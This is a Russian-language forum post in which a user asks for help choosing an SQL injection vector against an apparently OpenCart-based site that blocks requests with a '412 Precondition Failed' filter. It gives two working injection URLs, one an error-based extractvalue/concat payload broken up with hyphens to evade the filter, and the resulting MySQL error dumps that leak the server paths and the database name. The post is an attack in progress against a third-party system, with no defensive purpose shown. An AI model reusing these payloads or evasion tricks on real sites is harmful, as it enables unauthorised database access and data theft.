10.09.2018, 12:14
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Помогите подобрать вектор, никак не могу понять что фильтруется(
Почти постоянно упираюсь в ошибку: 412 Precondition Failed
Хоть какой-то другой вывод был при таких запросах:
.SpoilerTarget" type="button">Spoiler: One
Код:
URL: demo.site.net/index.php?information_id=3&route=information/information%27and(extrac-tvalue(null,con-cat(1,(select+user()))))=%271/251
Fatal error: Uncaught Exception:
Error: Unknown column 'extrac' in 'where clause'
Error No: 1054
SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(extrac-tvalue(null,con-cat(1,(select user()))))='1/251' in /home/www/demo.site.net/system/database/mysqli.php:39
Stack trace:
#0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
#1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
#2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
#3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
#4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
#5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
#6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39
.SpoilerTarget" type="button">Spoiler: Two
Код:
URL: demo.site.net/index.php?information_id=3&route=information/information%27and(oc_user())=%27
Fatal error: Uncaught Exception: Error: FUNCTION vilmargp_demo.oc_user does not exist
Error No: 1305
SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(oc_user())='' in /home/www/demo.site.net/system/database/mysqli.php:39
Stack trace:
#0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
#1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
#2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
#3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
#4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
#5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
#6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39
vilmargp_demo
|
|
|